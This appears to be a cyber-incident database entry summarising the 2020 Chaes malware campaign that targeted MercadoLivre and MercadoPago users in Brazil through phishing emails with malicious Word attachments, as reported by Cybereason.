Cyber Incident Victim: MercadoLivre
Date:
Nov 2020
Location:
Brazil
Summary
A previously unknown malware strain called Chaes targeted users of Latin America's largest e-commerce platform through phishing campaigns impersonating purchase confirmations. The malicious emails contained .docx attachments exploiting Microsoft Word's template injection to download payloads that established persistence and deployed information-stealing modules. The malware harvested system data, browser credentials, and financial information—specifically targeting the platform's payment pages—while using Puppeteer to automate unauthorized access and screenshot capture of sensitive sessions. Chaes employed evasion techniques like disguising processes as legitimate activity and leveraged Node.js libraries for web scraping, complicating detection. The malware also included cryptocurrency mining functionality and showed ongoing development with refined targeting of e-commerce transaction pages.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 2 techniques |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
In late 2020, cybersecurity firm Cybereason identified a previously unknown malware strain called Chaes targeting customers of MercadoLivre, Latin America’s largest e-commerce platform. The attacks began with phishing emails designed to mimic legitimate purchase confirmation messages from MercadoLivre, including a deceptive "scanned by Avast" footnote to enhance credibility. These emails contained malicious .docx file attachments that exploited Microsoft Word’s template injection feature to retrieve payloads from remote servers. Upon execution, the initial payload established connections to attacker-controlled command-and-control (C2) servers and downloaded an .msi file, which subsequently deployed additional components including a .vbs script, uninstall.dll, and engine.bin—collectively forming the malware’s core engine. Further files (hhc.exe, hha.dll, and chaes1.bin) were installed to assemble Chaes’s primary functionality, which included a cryptocurrency mining module. The malware created registry keys to ensure persistence and disguised its modules as legitimate processes to evade detection.
Chaes specifically targeted financial and personal data from infected systems, with a focus on MercadoLivre users. It extracted sensitive information from Google Chrome sessions using API hooking and the Node.js library Puppeteer, enabling unauthorized access to MercadoLivre and its payment service MercadoPago. The malware harvested login credentials, monitored browsing activity, and captured screenshots of MercadoLivre pages—particularly those related to purchases—sending this data to C2 servers. Cybereason noted Chaes’s evolving nature, with later versions refining its targeting of e-commerce transaction pages. The use of Puppeteer posed detection challenges, as its web-scraping functionality typically appears benign. While the primary campaign impacted Brazilian MercadoLivre customers, Cybereason investigated potential links to attacks against other e-commerce entities and warned of broader risks to financial institutions adopting similar techniques. No mitigation actions by MercadoLivre were detailed in the report.